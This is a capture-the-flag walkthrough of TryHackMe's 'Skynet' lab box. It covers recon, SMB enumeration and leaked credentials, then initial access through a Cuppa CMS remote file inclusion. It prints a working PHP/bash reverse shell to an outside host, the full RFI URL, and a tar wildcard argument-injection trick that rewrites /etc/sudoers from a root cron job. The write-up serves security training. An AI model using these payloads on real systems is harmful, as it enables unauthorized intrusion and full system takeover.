Skynet
An easy Linux box from TryHackMe, follow a string of leaked data to get creds, then leverage an RFI for initial access, and use a cronjob run as root to escalate.
Recon
A linux box from the description
Running the regular nmap
sudo nmap -sC -sV -oA nmap/skynet 10.10.204.86
Find a webserver on port 80 and SMB on 445 on the machine
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE UIDL PIPELINING SASL CAPA TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more have SASL-IR LOGIN-REFERRALS ENABLE listed capabilities ID Pre-login OK LOGINDISABLEDA0001 LITERAL+ IDLE IMAP4rev1 post-login
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to the IP in the browser see a search box without any functionality
Lets try to see if there are any hidden directories or files
sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o skynet.dirs -u 10.10.204.86
And find an interesting directory called “squirrelmail”, navigating to it see a login screen for an old piece of software with the same name, with the version 1.4.23
Theres a few exploits, but none that seem to be useful without some kind of login - the most promising one is a RFI, but it doesn’t work without being logged into the SquirrelMail app
When you try to navigate to /etc/passwd for example, gives an auth error
Looking at the SMB port, enumerating it with enum4linux find a username - “milesdyson”
enum4linux 10.10.204.86
=============================
| Users on 10.10.204.86 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
Also find a share with anonymous access, called “anonymous”
[+] Attempting to map shares on 10.10.204.86
//10.10.204.86/print$ Mapping: DENIED, Listing: N/A
//10.10.204.86/anonymous Mapping: OK, Listing: OK
//10.10.204.86/milesdyson Mapping: DENIED, Listing: N/A
//10.10.204.86/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
Connecting to the share with smbclient, download the contents of the anonymous share
smbclient \\\\10.10.204.86\\anonymous
And the download the log files inside
cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
Seems like a list of passwords, lets try them with the username “milesdyson” on the squirrelmail app
The correct password ends up being the first one, cyborg007haloterminator
milesdyson:cyborg007haloterminator are the creds so far
Looking into the emails, see a password reset email
So maybe for the other share called milesdyson, the password is )s{A&2Z=F^n_E.B`
Lets try to log in to the other samba share, and we get in
Inside the samba share there is an “important.txt” file within a notes directory, inside it there is mention of a CMS at a hidden endpoint
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
At that endpoint there isnt much just a static page, so enumerate the subdirectories with gobuster and find a /administrator endpoint - which leads to a Cuppa CMS login page
sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u 10.10.204.86/45kra24zxs28v3yd
Trying some basic logins can’t get in, but searching for “Cuppa” on exploitDB find a file inclusion vulnerability that can easily lead to php code execution here
Exploitation
Essentially a remote file inclusion that lets you craft a php reverse shell file, and then run it on the server
The php code is (really just a php wrapper on a bash reverse shell)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.6.107.137/9999 0>&1'");?>
Stored in a rev.php file, and then running a simple python server to be able to reference it in the RFI by going to the URL here, as well as a listener on port 9999
http://10.10.204.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.107.137:8000/rev.php
And get a reverse shell, now for privelege escalation
Looking around find user.txt inside milesdyson’s home directory, but also a backups directory with backups.sh inside
Looking at the crontable with “view /etc/crontab” - see that the script is being run as the root user every minute
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat-ing the script, see two lines
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
Checking the path first, can’t write to any of the directories ahead of the location of the tar binary
Instead, looking at the wildcard, see that the folder is /var/www/html which is being zipped up (and the wildcard means all the files are being zipped)
Looking into how the “cf” flag works in tar, it just lists out the directory names and zips them all into the .tgz file
Here can use command injection via file names in the /var/www/html directory
Using the guide here, create a series of directories that execute a script as root, granting the user all sudo access (can replace the script with a reverse shell, creating an extra user, or whatever else - there are a lot of ways to get privelege with a writeable .sh script being run as root)
The files are created like so inside of the /var/www/html directory
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
And then once cron executes the backup script, get root on the system with
sudo su
And get root!!